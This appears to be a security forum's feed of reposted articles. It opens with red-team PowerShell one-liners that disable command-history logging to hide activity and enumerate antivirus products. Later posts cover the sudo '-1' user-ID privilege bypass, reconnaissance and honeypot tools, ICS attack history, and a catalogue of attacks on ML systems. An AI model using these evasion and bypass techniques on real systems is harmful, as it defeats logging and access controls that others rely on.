If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "yes"; } else { echo "no"; }

Disable PowerShell command logging

By default, PowerShell automatically logs up to 4096 commands in the history file, similarly to Bash on Linux. The PowerShell history file is a plaintext file located in each user’s profile in the following location:

C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

With the following command(s) we can disable the PowerShell command logging functionality in the current shell session:

Set-PSReadlineOption -HistorySaveStyle SaveNothing

or

Remove-Module PSReadline

This can be useful in red team exercises if we want to minimize our footprint on the system. From now on, no command will be recorded in the PowerShell history file. Note however that the above command(s) will themselves still be echoed in the history file, so be aware that this is not completely covert.

List installed antivirus (AV) products

Here’s a simple PowerShell command to query the Security Center and identify all installed antivirus products on this computer:

Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct

By decoding the productState value, we can identify which AV is currently enabled (in case there is more than one installed), whether the signatures are up to date, and even which AV features and scanning engines are enabled (e.g. real-time protection, anti-spyware, auto-update etc.). This is, however, quite an esoteric topic without a simple solution.
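If you want to experiment with productState decoding, here is a small sketch based on the commonly cited community interpretation of the field. The layout is not officially documented, so treat this as a heuristic rather than a reference implementation:

```python
def decode_product_state(product_state):
    """Decode WMI AntiVirusProduct.productState (heuristic, undocumented).

    Commonly cited interpretation: render the value as six hex digits;
    digits 3-4 indicate real-time protection ('10'/'11' = enabled),
    digits 5-6 indicate signature status ('00' = up to date).
    """
    hexed = f"{product_state:06x}"
    return {
        "enabled": hexed[2:4] in ("10", "11"),  # real-time protection on
        "up_to_date": hexed[4:6] == "00",       # definitions current
    }
```

For example, a productState of 397568 (0x061100) decodes as enabled with current signatures, while 393472 (0x060100) decodes as disabled.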
Here are some links on the topic:

https://mspscripts.com/get-installed-antivirus-information-2/
https://jdhitsolutions.com/blog/powershell/5187/get-antivirus-product-status-with-powershell/
https://stackoverflow.com/questions/4700897/wmi-security-center-productstate-clarification/4711211
https://docs.microsoft.com/en-us/windows/win32/api/iwscapi/ne-iwscapi-wsc_security_product_state
https://social.msdn.microsoft.com/Forums/pt-BR/6501b87e-dda4-4838-93c3-244daa355d7c/wmisecuritycenter2-productstate

Conclusion

Hope you find this collection useful during your pentests. Please leave a comment with YOUR favorite one-liner. For other interesting commands, check out our pure PowerShell infosec reference or have a look at our collection of minimalistic offensive security tools on GitHub.

Source: infosecmatter.com
-
-
Looking for a programmer for metal scaffolding design software
Kev replied to donaty33's topic in Locuri de munca
Leave me a PM with contact details, I know someone -
Over the past few days, news of CVE-2019-14287 — a newly discovered open source vulnerability in Sudo, Linux’s popular command tool — has been grabbing quite a few headlines. Since vulnerabilities in widespread and established open source projects can often cause a stir, we decided to present you with a quick cheat sheet to let you know exactly what the fuss is about.

Here is everything you need to know about the Sudo vulnerability, how it works, and how to handle the vulnerable Sudo component if you find that you are currently at risk.

Why Is The New Sudo Security Vulnerability (CVE-2019-14287) Making Waves?

Let’s start with the basics. Sudo is a program dedicated to the Linux operating system, or any other Unix-like operating system, and is used to delegate privileges. For example, it can be used by a local user who wants to run commands as root — the Windows equivalent of an admin user.

On October 14, the Sudo team published a security alert about CVE-2019-14287, a new security issue discovered by Joe Vennix of Apple Information Security in all Sudo versions prior to version 1.8.28. The security flaw could enable a malicious user to execute arbitrary commands as root even in cases where root access is disallowed. Considering how widespread Sudo usage is among Linux users, it’s no surprise that everybody’s talking about the security vulnerability.

The Sudo Vulnerability Explained

That’s the scary version, and when we think about how powerful and popular Sudo is, CVE-2019-14287 should not be ignored. That said, it’s also important to note that the vulnerability is only relevant in a specific configuration of the Sudo security policy, called “sudoers”, which helps ensure that privileges are limited only to specific users.
The issue occurs when a sysadmin inserts an entry into the sudoers file, for example:

jacob myhost = (ALL, !root) /usr/bin/chmod

This entry means that user jacob is allowed to run “chmod” as any user except the root user, meaning a security policy is in place to limit access — sounds good, right?

Unfortunately, Joe Vennix from Apple Information Security found that the function fails to parse all values correctly, and when given the user ID “-1” or its unsigned equivalent “4294967295”, the command will run as root, bypassing the security policy entry we set in the example above. In the example below, when we run with the “-1” user ID, we get the ID number “0”, which is the root user value:

Stay Secure: Keep Calm And Update Your Sudo Version

And now for some good news: the Sudo team has already released a secure version, so if you are using this particular security configuration, make sure to update to version 1.8.28 or later.

In addition, as you can see, the Sudo vulnerability only occurs in a very specific configuration. As is often the case when newly disclosed security vulnerabilities in popular open source projects make a splash, there’s no need to panic. While Sudo is an extremely popular and widely used project, the vulnerability is only relevant in a specific scenario, and it has already been fixed in the updated version. Our best advice is to keep calm, and make sure you update your open source software components.

Via whitesourcesoftware.com
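As a footnote to the article above: the signed/unsigned conversion at the heart of the bug can be demonstrated in a few lines of Python. This illustrates the integer behavior only, not sudo's actual code (the helper name is mine):

```python
import ctypes

def as_unsigned_uid(user_supplied_id):
    """Show how a signed -1 reinterprets as a 32-bit unsigned uid."""
    return ctypes.c_uint32(user_supplied_id).value

# "-1" and "4294967295" are the same 32-bit pattern. setuid(-1) is
# specified to mean "leave the uid unchanged" -- and since sudo is
# already running as root (uid 0), the command keeps uid 0.
```

So sudo -u#-1 and sudo -u#4294967295 are indistinguishable once the value reaches the system call, which is why both bypass the (ALL, !root) restriction.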
-
https://octopus.com/blog/public-bug-bounty
-
Is investing in alternative energy for BTC mining worth it?
Kev replied to ardu2222's topic in Electronica
dude, there are at least 10 hybrid cars in a town of a few k inhabitants, you could wrap them in solar cells until the next station -
EasyRecon is a script that does the initial reconnaissance of a target automatically. To scan Google, simply run:

$ ./easyRecon.sh google.com

Setup

To install EasyRecon, clone this repository. EasyRecon relies on a couple of tools, so make sure you have them installed:

subfinder
httprobe
waybackurls

Since most of these tools are written in Go, make sure you have Go installed and configured properly. Make sure that when you type any of the above commands in the terminal, they are recognized and work.

Usage

$ ./easyRecon.sh example.com

Features

Enumerate all the existing subdomains with subfinder
Separate live domains from all existing domains with httprobe
Spider the target and save all the URLs of the target using waybackurls
grep all the js files and endpoints from the target

Download easyrecon-main.zip or git clone https://github.com/cspshivam/easyrecon.git

Source
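As an aside, the probe and grep steps in the feature list can be sketched in Python to show conceptually what the pipeline does (helper names are hypothetical; the real work is done by subfinder, httprobe and waybackurls):

```python
def probe_candidates(domains):
    """httprobe-style expansion: the URLs worth probing for each domain."""
    return [f"{scheme}://{d}" for d in domains for scheme in ("http", "https")]

def js_files(urls):
    """grep-like filter: keep JavaScript endpoints from wayback output,
    ignoring any query string when checking the extension."""
    return [u for u in urls if u.split("?")[0].endswith(".js")]
```

httprobe then keeps only the candidates that actually answer, and the .js list is what you would feed into endpoint discovery.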
-
-
“Petrochemical plant” — The Treasury Department for the first time levied sanctions for an ICS cyberattack. (CC BY-NC-ND 2.0)

The Treasury Department’s Office of Foreign Assets Control sanctioned a Russian government research institution linked to the Triton malware targeting industrial safety systems, the first time the U.S. has taken such an action for an industrial control system attack. Treasury Secretary Steve Mnuchin called out the Russian government for continuing “to engage in dangerous cyber activities aimed at the U.S. and its allies.”

The State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics built the tools behind a 2017 Triton attack on a petrochemical facility in the Middle East. The malware, also known as Trisis and Hatman, has been used against U.S. partners in the Middle East, and the agency said in a release that Triton hackers have reportedly been scanning and probing U.S. facilities.

“An OFAC sanction by the U.S. Treasury is significant and compelling; not only will it impact this research institution in Russia, but anyone working with them will have their ability to be successful on the international stage severely hampered,” said Robert Lee, CEO and co-founder of Dragos, Inc.

“The most important aspect of this development, however, is the attribution to Russia for the Trisis attack by the USG officially and the explicit call out of industrial control systems in the sanction,” said Lee. “This is a norm setting moment and the first time an ICS cyberattack has ever been sanctioned.”

He called the sanction “entirely appropriate” since the cyberattack on the petrochemical facility “was the first ever targeted explicitly towards human life. We are fortunate no one died and I’m glad to see governments take a strong stance condemning such attacks.”

Via scmagazine.com
-
kid, that hasn't been done in years, it's IPv6 now; you could even have mama:si:pe:tata in your dictionary. Get to work and drop the nonsense
-
Description

Manuka is an Open-source intelligence (OSINT) honeypot that monitors reconnaissance attempts by threat actors and generates actionable intelligence for Blue Teamers. It creates a simulated environment consisting of staged OSINT sources, such as social media profiles and leaked credentials, and tracks signs of adversary interest, closely aligning to MITRE’s PRE-ATT&CK framework. Manuka gives Blue Teams additional visibility of the pre-attack reconnaissance phase and generates early-warning signals for defenders.

Although they vary in scale and sophistication, most traditional honeypots focus on networks. These honeypots uncover attackers at Stage 2 (Weaponization) to 7 (Actions on Objectives) of the cyber kill chain, with the assumption that attackers are already probing the network.

Manuka conducts OSINT threat detection at Stage 1 (Reconnaissance) of the cyber kill chain. Despite investing millions of dollars into network defenses, organisations can be easily compromised through a single Google search. One recent example is hackers exposing corporate meetings, therapy sessions, and college classes through Zoom calls left on the open Web. Enterprises need to detect these OSINT threats on their perimeter but lack the tools to do so.

Manuka is built to scale. Users can easily add new listener modules and plug them into the Dockerized environment. They can coordinate multiple campaigns and honeypots simultaneously to broaden the honeypot surface. Furthermore, users can quickly customize and deploy Manuka to match different use cases. Manuka’s data is designed to be easily ported to other third-party analysis and visualization tools in an organisation’s workflow.

Designing an OSINT honeypot presents a novel challenge due to the complexity and wide range of OSINT techniques. However, such a tool would allow Blue Teamers to “shift left” in their cyber threat intelligence strategy.
Dashboard

Tool Design

Architecture

Manuka is built on the following key terms and processes.

Sources: Possible OSINT vectors such as social media profiles, exposed credentials, and leaked source code.
Listeners: Servers that monitor sources for interactions with attackers.
Hits: Indicators of interest such as attempted logins with leaked credentials and connections on social media.
Honeypots: Groups of sources and listeners that are organized into a single Campaign which analyzes and tracks hits over time.

System Design

The framework itself consists of several Docker containers which can be deployed on a single host.

manuka-server: Central Golang server that performs CRUD operations and ingests hits from listeners.
manuka-listener: Modular Golang server that can perform different listener roles.
manuka-client: React dashboard for Blue Team to manage Manuka’s resources.

These containers are orchestrated through a single docker-compose command.

Development

In development, the components run on the following ports in their respective containers:

manuka-client: 3000
manuka-server: 8080
manuka-listener: 8080

To allow the client and server to talk without CORS issues, an additional nginx layer on localhost:8080 proxy-passes /api/ to manuka-server and / to manuka-listener. In addition, manuka-listener operates on the following ports:

8081 for the staged login webpage
8082 for interacting with the staged email

Requirements

See the individual component repositories for their requirements.

docker >= 19.03.8
docker-compose >= 1.25.4
ngrok >= 2.3.35

Configure

Create a file in docker/secrets/postgres_password with the password for Postgres. Setup a Google account for Gmail to receive emails from social media profiles. Setup Google Cloud Pub/Sub on https://console.cloud.google.com/cloudpubsub for push email functionality (guide: https://developers.google.com/gmail/api/guides/push). The guide also has instructions to create a Cloud project.
Create file docker/secrets/google_credentials.json with your project's credentials. Add the topic created on Cloud Pub/Sub to docker/secrets/google_topic. Obtain an oauth2 token for your Google account. Manuka requires an oauth2 token the first time it is run; subsequently, it will automatically refresh the token. Save the token in docker/secrets/google_oauth2_token.json.

Run docker-compose -f docker-compose.yml -f docker-compose-dev.yml up --build --remove-orphans

Initialize the manuka-listener gmail push service:

Initialize ngrok: ./ngrok http <manuka-listener port> and take note of the https URL.
On the Google Pub/Sub dashboard left-hand menu, go to Subscriptions -> <subscription name> -> Edit Subscription and change the Endpoint URL to <ngrok https URL>/notifications.
Try sending an email from another account to the target Gmail account. You should see POST /notifications 200 OK on the ngrok console, and Received push notification on the listener console.

Currently Supported Listeners

1. Social Listener

Monitors for social activities on Facebook and LinkedIn. Currently supports notification of network connection attempts. Note that the monitored social media account(s) should have email notification enabled. The corresponding email account(s) receiving the email notifications from the social media platforms should be configured to forward these emails to the centralised gmail account.

2. Login Listener

Monitors for attempted login using leaked credentials on the honeypot site.

Download: manuka-master.zip or git clone https://github.com/spaceraccoon/manuka.git

Source
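To make the Sources/Listeners/Hits terminology concrete, here is a toy Python model of the bookkeeping. This is purely illustrative (Manuka itself is Go and React); the class and field names are my own:

```python
from dataclasses import dataclass, field

@dataclass
class Hit:
    source: str   # e.g. "login-listener", "social-listener"
    detail: str   # e.g. attempted username, connecting profile

@dataclass
class Campaign:
    """Toy model of a Manuka campaign: listeners report hits against
    staged sources, and the campaign tracks them over time."""
    name: str
    hits: list = field(default_factory=list)

    def record(self, source, detail):
        self.hits.append(Hit(source, detail))

    def hits_for(self, source):
        return [h for h in self.hits if h.source == source]
```

A dashboard like manuka-client would then just be a view over hits_for() per source, plotted over time.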
-
-
This app allows you to simulate how any origami crease pattern will fold. It may look a little different from what you typically think of as "origami" - rather than folding paper in a set of sequential steps, this simulation attempts to fold every crease simultaneously. It does this by iteratively solving for small displacements in the geometry of an initially flat sheet due to forces exerted by creases. You can read more about it in our paper:

Fast, Interactive Origami Simulation using GPU Computation by Amanda Ghassaei, Erik Demaine, and Neil Gershenfeld (7OSME)

All simulation methods were written from scratch and are executed in parallel in several GPU fragment shaders for fast performance. The solver extends work from the following sources:

Origami Folding: A Structural Engineering Approach by Mark Schenk and Simon D. Guest
Freeform Variations of Origami by Tomohiro Tachi

Built by Amanda Ghassaei as a final project for Geometric Folding Algorithms. Code available on Github. If you have interesting crease patterns that would make good demo files, please send them to me (Amanda) so I can add them to the Examples menu. My email address is on my website. Thanks!

Instructions:

Slide the Fold Percent slider to control the degree of folding of the pattern (100% is fully folded, 0% is unfolded, and -100% is fully folded with the opposite mountain/valley assignments).
Drag to rotate the model, scroll to zoom.
Import other patterns under the Examples menu.
Upload your own crease patterns in SVG or FOLD formats, following these instructions.
Export FOLD files or 3D models (STL or OBJ) of the folded state of your design (File > Save Simulation as...).
Visualize the internal strain of the origami as it folds using the Strain Visualization in the left menu of the Advanced Options.
If you are working from a computer connected to a VR headset and hand controllers, follow these instructions to use this app in an interactive virtual reality mode.
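The "iteratively solving for small displacements" idea can be illustrated with a one-degree-of-freedom toy in Python. This is a gross simplification of the actual GPU solver (one crease angle instead of a whole mesh, and made-up step count and gain), but it shows the shape of the method: each step applies a small correction proportional to the crease's distance from its target fold angle.

```python
def relax_fold(target_deg, steps=200, k=0.1):
    """Nudge a single crease angle toward its target, a little per step.

    angle starts at 0 (flat sheet); the per-step displacement is
    proportional to the remaining error, like a crease-stiffness force.
    """
    angle = 0.0
    for _ in range(steps):
        angle += k * (target_deg - angle)  # small displacement toward target
    return angle
```

The Fold Percent slider effectively rescales target_deg for every crease at once, and the solver re-relaxes the whole mesh toward the new targets.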
External Libraries:

All rendering and 3D interaction done with three.js
path-data-polyfill helps with SVG path parsing
FOLD is used as the internal data structure; methods from the FOLD API used for SVG parsing
Arbitrary polygonal faces of imported geometry are triangulated using the Earcut Library
Portability to multiple VR controllers by THREE.VRController.js
VR GUI by dat.guiVR
numeric.js for linear algebra operations
FileSaver for client-side file saving
GIF and WebM video export uses CCapture
jQuery, Bootstrap, and the Flat UI theme used to build the regular GUI

You can find additional information in our 7OSME paper and this website.

Source: origamisimulator.org
-
-
The last major release of the X.Org Server was in May 2018, but don't expect the long-awaited X.Org Server 1.21 to actually be released anytime soon. This should hardly be surprising, but a prominent Intel open-source developer has conceded that the X.Org Server is pretty much "abandonware" with Wayland being the future.

This comes as X.Org Server development hits a nearly two-decade low: the X.Org Server is well off its six-month release cadence, not having seen a major release in over two years, and no one is stepping up to manage the 1.21 release. A year ago there was a proposal to see new releases driven via continuous integration testing, but even that didn't take flight, and as we roll into 2021 there isn't any motivation for releasing new versions of the X.Org Server by those capable of doing so.

Red Hat folks have long stepped up to manage X.Org Server releases, but with Fedora Workstation using Wayland by default and RHEL working that way, they haven't been eager to devote resources to new X.Org Server releases. Other major stakeholders have also resisted stepping up to ship 1.21 or commit any major resources to new xorg-server versions.

This week brought a tentative merge request for allowing atomic support in the xf86-video-modesetting DDX. It's actually about partially restoring the support (and not enabled by default) after the atomic code was previously disabled over bugs. Daniel Vetter of Intel's kernel graphics driver team, a DRM co-maintainer, commented on it. (Then again, that coming from an Intel Linux developer isn't too surprising considering it's been more than six years since the last xf86-video-intel DDX release.)

Besides the likes of Red Hat, Intel has been the only other major organization in recent times willing to devote resources to areas like X.Org release management, but even though they let go some of their Wayland folks years ago, they seem uninterested in devoting much to X.Org Server advancements as we approach 2021.
With Ubuntu 21.04 also possibly defaulting to Wayland for its GNOME session, the KDE Wayland support getting squared away, and other advancements continuing, X.Org Server 1.21 may very well prove to be an elusive release. Via phoronix.com
-
A secret experiment in 2007 proved that hackers could devastate power grid equipment beyond repair—with a file no bigger than a GIF.

A control room in an Idaho National Labs facility. PHOTOGRAPH: JIM MCAULEY/THE NEW YORK TIMES/REDUX

EARLIER THIS WEEK, the US Department of Justice unsealed an indictment against a group of hackers known as Sandworm. The document charged six hackers working for Russia's GRU military intelligence agency with computer crimes related to half a decade of cyberattacks across the globe, from sabotaging the 2018 Winter Olympics in Korea to unleashing the most destructive malware in history in Ukraine.

Among those acts of cyberwar was an unprecedented attack on Ukraine's power grid in 2016, one that appeared designed not merely to cause a blackout, but to inflict physical damage on electric equipment. And when one cybersecurity researcher named Mike Assante dug into the details of that attack, he recognized a grid-hacking idea invented not by Russian hackers, but by the United States government, and tested a decade earlier.

The following excerpt from the book SANDWORM: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers, published in paperback this week, tells the story of that early, seminal grid-hacking experiment. The demonstration was led by Assante, the late, legendary industrial control systems security pioneer. It would come to be known as the Aurora Generator Test. Today, it still serves as a powerful warning of the potential physical-world effects of cyberattacks—and an eerie premonition of Sandworm's attacks to come.

ON A PIERCINGLY cold and windy morning in March 2007, Mike Assante arrived at an Idaho National Laboratory facility 32 miles west of Idaho Falls, a building in the middle of a vast, high desert landscape covered with snow and sagebrush. He walked into an auditorium inside the visitors’ center, where a small crowd was gathering.
The group included officials from the Department of Homeland Security, the Department of Energy, and the North American Electric Reliability Corporation (NERC), executives from a handful of electric utilities across the country, and other researchers and engineers who, like Assante, were tasked by the national lab to spend their days imagining catastrophic threats to American critical infrastructure. At the front of the room was an array of video monitors and data feeds, set up to face the room’s stadium seating, like mission control at a rocket launch. The screens showed live footage from several angles of a massive diesel generator. The machine was the size of a school bus, a mint green, gargantuan mass of steel weighing 27 tons, about as much as an M3 Bradley tank. It sat a mile away from its audience in an electrical substation, producing enough electricity to power a hospital or a navy ship and emitting a steady roar. Waves of heat coming off its surface rippled the horizon in the video feed’s image. Assante and his fellow INL researchers had bought the generator for $300,000 from an oil field in Alaska. They’d shipped it thousands of miles to the Idaho test site, an 890-square-mile piece of land where the national lab maintained a sizable power grid for testing purposes, complete with 61 miles of transmission lines and seven electrical substations. Now, if Assante had done his job properly, they were going to destroy it. And the assembled researchers planned to kill that very expensive and resilient piece of machinery not with any physical tool or weapon but with about 140 kilobytes of data, a file smaller than the average cat GIF shared today on Twitter. THREE YEARS EARLIER, Assante had been the chief security officer at American Electric Power, a utility with millions of customers in 11 states from Texas to Kentucky. A former navy officer turned cybersecurity engineer, Assante had long been keenly aware of the potential for hackers to attack the power grid. 
But he was dismayed to see that most of his peers in the electric utility industry had a relatively simplistic view of that still-theoretical and distant threat. If hackers did somehow get deep enough into a utility’s network to start opening circuit breakers, the industry’s common wisdom at the time was that staff could simply kick the intruders out of the network and flip the power back on. “We could manage it like a storm,” Assante remembers his colleagues saying. “The way it was imagined, it would be like an outage and we’d recover from the outage, and that was the limit of thinking around the risk model.”

But Assante, who had a rare level of crossover expertise between the architecture of power grids and computer security, was nagged by a more devious thought. What if attackers didn’t merely hijack the control systems of grid operators to flip switches and cause short-term blackouts, but instead reprogrammed the automated elements of the grid, components that made their own decisions about grid operations without checking with any human?

An electrical substation at Idaho National Labs’ sprawling, 890-square-mile test site. COURTESY OF IDAHO NATIONAL LABORATORY

In particular, Assante had been thinking about a piece of equipment called a protective relay. Protective relays are designed to function as a safety mechanism to guard against dangerous physical conditions in electric systems. If lines overheat or a generator goes out of sync, it’s those protective relays that detect the anomaly and open a circuit breaker, disconnecting the trouble spot, saving precious hardware, even preventing fires. A protective relay functions as a kind of lifeguard for the grid.

But what if that protective relay could be paralyzed—or worse, corrupted so that it became the vehicle for an attacker’s payload? That disturbing question was one Assante had carried over to Idaho National Laboratory from his time at the electric utility.
Now, in the visitor center of the lab’s test range, he and his fellow engineers were about to put his most malicious idea into practice. The secret experiment was given a code name that would come to be synonymous with the potential for digital attacks to inflict physical consequences: Aurora. THE TEST DIRECTOR read out the time: 11:33 a.m. He checked with a safety engineer that the area around the lab’s diesel generator was clear of bystanders. Then he sent a go-ahead to one of the cybersecurity researchers at the national lab’s office in Idaho Falls to begin the attack. Like any real digital sabotage, this one would be performed from miles away, over the internet. The test’s simulated hacker responded by pushing roughly thirty lines of code from his machine to the protective relay connected to the bus-sized diesel generator. The inside of that generator, until that exact moment of its sabotage, had been performing a kind of invisible, perfectly harmonized dance with the electric grid to which it was connected. Diesel fuel in its chambers was aerosolized and detonated with inhuman timing to move pistons that rotated a steel rod inside the generator’s engine—the full assembly was known as the “prime mover”—roughly 600 times a minute. That rotation was carried through a rubber grommet, designed to reduce any vibration, and then into the electricity-generating components: a rod with arms wrapped in copper wiring, housed between two massive magnets so that each rotation induced electrical current in the wires. Spin that mass of wound copper fast enough, and it produced 60 hertz of alternating current, feeding its power into the vastly larger grid to which it was connected. A protective relay attached to that generator was designed to prevent it from connecting to the rest of the power system without first syncing to that exact rhythm: 60 hertz. But Assante’s hacker in Idaho Falls had just reprogrammed that safeguard device, flipping its logic on its head. 
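The logic inversion at the core of the Aurora attack can be reduced to a toy Boolean sketch in Python. This is obviously not the actual relay firmware, just the shape of the flip the excerpt describes:

```python
def protective_relay(synced):
    """Normal logic: keep the breaker closed only while the generator
    is in sync with the grid (True -> stay connected)."""
    return synced

def aurora_relay(synced):
    """The corrupted logic: the same check, inverted -- open the breaker
    when synced, and reconnect once the generator has drifted out of sync."""
    return not synced
```

Cycling that inverted decision is what repeatedly slammed the free-spinning generator back against the grid's frequency, tearing it apart.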
At 11:33 a.m. and 23 seconds, the protective relay observed that the generator was perfectly synced. But then its corrupted brain did the opposite of what it was meant to do: It opened a circuit breaker to disconnect the machine. When the generator was detached from the larger circuit of Idaho National Laboratory’s electrical grid and relieved of the burden of sharing its energy with that vast system, it instantly began to accelerate, spinning faster, like a pack of horses that had been let loose from its carriage. As soon as the protective relay observed that the generator’s rotation had sped up to be fully out of sync with the rest of the grid, its maliciously flipped logic immediately reconnected it to the grid’s machinery. The moment the diesel generator was again linked to the larger system, it was hit with the wrenching force of every other rotating generator on the grid. All of that equipment pulled the relatively small mass of the diesel generator’s own spinning components back to its original, slower speed to match its neighbors’ frequencies. On the visitor center’s screens, the assembled audience watched the giant machine shake with sudden, terrible violence, emitting a sound like a deep crack of a whip. The entire process from the moment the malicious code had been triggered to that first shudder had spanned only a fraction of a second. Black chunks began to fly out of an access panel on the generator, which the researchers had left open to watch its internals. Inside, the black rubber grommet that linked the two halves of the generator’s shaft was tearing itself apart. A few seconds later, the machine shook again as the protective relay code repeated its sabotage cycle, disconnecting the machine and reconnecting it out of sync. This time a cloud of gray smoke began to spill out of the generator, perhaps the result of the rubber debris burning inside it. 
Assante, despite the months of effort and millions of dollars in federal funds he’d spent developing the attack they were witnessing, somehow felt a kind of sympathy for the machine as it was being torn apart from within. “You find yourself rooting for it, like the little engine that could,” Assante remembered. “I was thinking, ‘You can make it!’ ” The machine did not make it. After a third hit, it released a larger cloud of gray smoke. “That prime mover is toast,” an engineer standing next to Assante said. After a fourth blow, a plume of black smoke rose from the machine thirty feet into the air in a final death rattle. The test director ended the experiment and disconnected the ruined generator from the grid one final time, leaving it deathly still. In the forensic analysis that followed, the lab’s researchers would find that the engine shaft had collided with the engine’s internal wall, leaving deep gouges in both and filling the inside of the machine with metal shavings. On the other side of the generator, its wiring and insulation had melted and burned. The machine was totaled. In the wake of the demonstration, a silence fell over the visitor center. “It was a sober moment,” Assante remembers. The engineers had just proven without a doubt that hackers who attacked an electric utility could go beyond a temporary disruption of the victim’s operations: They could damage its most critical equipment beyond repair. “It was so vivid. You could imagine it happening to a machine in an actual plant, and it would be terrible,” Assante says. “The implication was that with just a few lines of code, you can create conditions that were physically going to be very damaging to the machines we rely on.” But Assante also remembers feeling something weightier in the moments after the Aurora experiment. It was a sense that, like Robert Oppenheimer watching the first atomic bomb test at another U.S. 
national lab six decades earlier, he was witnessing the birth of something historic and immensely powerful. Via wired.com
-
Microsoft has unveiled a new open-source "matrix" that aims to identify all the existing attacks that threaten the security of machine learning applications. Microsoft and non-profit research organization MITRE have joined forces to accelerate the development of cyber-security's next chapter: protecting applications that are based on machine learning and are at risk of new adversarial threats. The two organizations, in collaboration with academic institutions and other big tech players such as IBM and Nvidia, have released a new open-source tool called the Adversarial Machine Learning Threat Matrix. The framework is designed to organize and catalogue known techniques for attacks against machine learning systems, to inform security analysts and provide them with strategies to detect, respond to and remediate threats. The matrix classifies attacks based on criteria related to various aspects of the threat, such as execution and exfiltration, but also initial access and impact. To curate the framework, Microsoft and MITRE's teams analyzed real-world attacks carried out on existing applications, which they vetted to be effective against AI systems. With AI systems increasingly underpinning our everyday lives, the tool seems timely. From finance to healthcare, through defense and critical infrastructure, the applications of machine learning have multiplied in the past few years. But MITRE's researchers argue that while eagerly accelerating the development of new algorithms, organizations have often failed to scrutinize the security of their systems. Surveys increasingly point to a lack of understanding within industry of the importance of securing AI systems against adversarial threats. Companies like Google, Amazon, Microsoft and Tesla have all seen their machine learning systems tricked in one way or another in the past three years.
Algorithms are prone to mistakes, especially when they are influenced by the malicious interventions of bad actors. In a separate study, a team of researchers recently ranked the potential criminal applications that AI will have in the next 15 years; among the list of highly worrying prospects was the opportunity for attack that AI systems present when algorithms are used in key applications like public safety or financial transactions. As MITRE and Microsoft's researchers note, attacks can come in many different shapes and forms. Threats go all the way from a sticker placed on a sign to make an automated system in a self-driving car make the wrong decision, to more sophisticated cybersecurity methods going by specialized names, like evasion, data poisoning, trojaning or backdooring. Centralizing the various aspects of all the methods that are known to effectively threaten machine learning applications in a single matrix, therefore, could go a long way in helping security experts prevent future attacks on their systems. MITRE's researchers are hoping to gather more information from ethical hackers, thanks to a well-established cybersecurity method known as red teaming. The idea is to have teams of benevolent security experts find ways to crack vulnerabilities ahead of bad actors, to feed into the existing database of attacks and expand overall knowledge of the possible threats. Microsoft and MITRE both have their own red teams, and they have already demonstrated some of the attacks that fed into the matrix as it stands. They include, for example, evasion attacks on machine-learning models, which can modify the input data to induce targeted misclassification. Via zdnet.com
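To make the evasion idea concrete, here is a minimal toy sketch (not taken from the matrix itself): for a linear classifier, nudging every input feature slightly against the sign of the model's weights pushes the score across the decision boundary and flips the prediction. The classifier, weights, and numbers below are all illustrative assumptions.

```python
# Toy linear classifier: predicts class 1 when the score W.x + B is positive.
W = [2.0, -1.0, 0.5]
B = 0.1

def score(x):
    return sum(w * xi for w, xi in zip(W, x)) + B

def predict(x):
    return 1 if score(x) > 0 else 0

def sign(v):
    return (v > 0) - (v < 0)

def evade(x, eps):
    """Fast-gradient-sign-style evasion step (sketch).

    For a linear model the gradient of the score with respect to the
    input is just W, so moving each feature by eps against sign(W)
    pushes the score toward (and past) the decision boundary.
    """
    direction = -1 if predict(x) == 1 else 1
    return [xi + direction * eps * sign(w) for xi, w in zip(x, W)]

x = [1.0, 0.2, 0.3]        # originally classified as class 1
x_adv = evade(x, eps=0.7)  # small per-feature perturbation flips the label
```

Real attacks against deep models work the same way in spirit, but compute the gradient numerically instead of reading it off the weights.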
-
Installation pip install multiplex # or better yet pipx install multiplex Python 3.7 or greater is required. Examples Parallel Execution Of Commands mp \ './some-long-running-process.py --zone z1' \ './some-long-running-process.py --zone z2' \ './some-long-running-process.py --zone z3' You can achieve the same effect using the Python API like this: from multiplex import Multiplex mp = Multiplex() for zone in ['z1', 'z2', 'z3']: mp.add(f"./some-long-running-process.py --zone {zone}") mp.run() Dynamically Add Commands my-script.sh: #!/bin/bash -e echo Hello There export REPO='git@github.com:dankilman/multiplex.git' mp 'git clone $REPO' mp 'pyenv virtualenv 3.8.5 multiplex-demo && pyenv local multiplex-demo' cd multiplex mp 'poetry install' mp 'pytest tests' mp @ Goodbye -b 0 And then running: mp ./my-script.sh -b 7 Python Controller An output similar to the first example can be achieved from a single process using the Python Controller API. import random import time import threading from multiplex import Multiplex, Controller CSI = "\033[" RESET = CSI + "0m" RED = CSI + "31m" GREEN = CSI + "32m" BLUE = CSI + "34m" MAG = CSI + "35m" CYAN = CSI + "36m" mp = Multiplex() controllers = [Controller(f"zone z{i+1}", thread_safe=True) for i in range(3)] for controller in controllers: mp.add(controller) def run(index, c): c.write( f"Starting long running process in zone {BLUE}z{index}{RESET}, " f"that is not really long for demo purposes\n" ) count1 = count2 = 0 while True: count1 += random.randint(0, 1000) count2 += random.randint(0, 1000) sleep = random.random() * 3 time.sleep(sleep) c.write( f"Processed {RED}{count1}{RESET} orders, " f"total amount: {GREEN}${count2}{RESET}, " f"Time it took to process this batch: {MAG}{sleep:0.2f}s{RESET}, " f"Some more random data: {CYAN}{random.randint(500, 600)}{RESET}\n" ) for index, controller in enumerate(controllers): thread = threading.Thread(target=run, args=(index+1, controller)) thread.daemon = True thread.start() mp.run() Help Screen
Type ? to toggle the help screen. Why Not Tmux? In short, they solve different problems. tmux is a full-blown terminal emulator multiplexer. multiplex, on the other hand, tries to optimize for a smooth experience in navigating output from several sources. tmux doesn't have any notion of scrolling panes. That is to say, the layout contains all panes at any given moment (unless maximized). In multiplex, the current view displays the boxes that fit on screen, but you can have many more, and you can move between boxes using less-inspired keys such as j, k, g, G, etc. Another aspect is that keybindings for moving around are much more ergonomic (as they are in less), because multiplex is not a full terminal emulator, so it can afford to use single-letter keyboard bindings (e.g. g for go to beginning). Download multiplex-master.zip or git clone https://github.com/dankilman/multiplex.git Source
-
